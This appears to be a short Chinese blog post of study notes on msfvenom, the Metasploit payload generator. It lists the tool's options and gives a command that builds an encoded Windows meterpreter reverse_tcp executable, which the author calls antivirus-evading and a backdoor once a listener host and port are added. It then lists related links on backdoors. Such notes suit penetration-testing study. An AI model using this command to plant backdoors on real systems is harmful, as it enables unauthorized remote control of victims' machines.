msfvenom学习
2018-05-07 15:37
417 查看
现在依然还有很多教学视频、资料是使用之前的kali版本。随着更新有些命令是不适应最新的kali的。(也是掉过坑的人)
msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。
msfvenom重要参数:(可以使用msfvenom -h查看所有参数)
-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式
另外几个命令:
平台查看: msfvenom --help-platforms
指定目标平台:--platform xxx
格式查看: msfvenom --help-formats
查看payload设置: msfvenom -p <payload name> --payload-options(可以发现该payload适合的平台等很多详细信息)
注意:如果要创建x64的负载需使用-a x64
正确生成免杀文件:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -f exe >1.exe
如果需要生成后门文件,需要加上lhost(本地主机ip)以及lport(本地主机开放的端口)参数。
参考文章:https://www.hackers-arise.com/single-post/2017/07/31/Metasploit-Basics-Part-9-Using-msfvenom-to-Create-Custom-Payloads
相关文章推荐
- BGP后门
- 一段加密的后门代码
- 苹果mac OS X上安装metasploit
- ASP木马后门新思路
- 网络后门面面观
- 利用wsc制作的一个asp后门
- perl后门,正向和反向!实例代码
- 隐藏ASP木马后门的两种方法
- 整理的比较全的一句话后门代码(方面大家查找后门)
- C++映像劫持后门实例分析
- 一些 PHP 管理系统程序中的后门
- 简单的Linux查找后门思路和shell脚本分享
- 一个不易被发现的PHP后门代码解析
- 华章3-4月份新书简介(2018年)
- Metasploit 生成***反弹shell
- 百度文库,优酷,土豆后门
- metasploit配合beef,ettercap欺骗拿下主机
- Metasploit 最简使用方法
- 如何给中国菜刀添加隐蔽后门
- Adobe Flash cve-2018-4878 的漏洞复现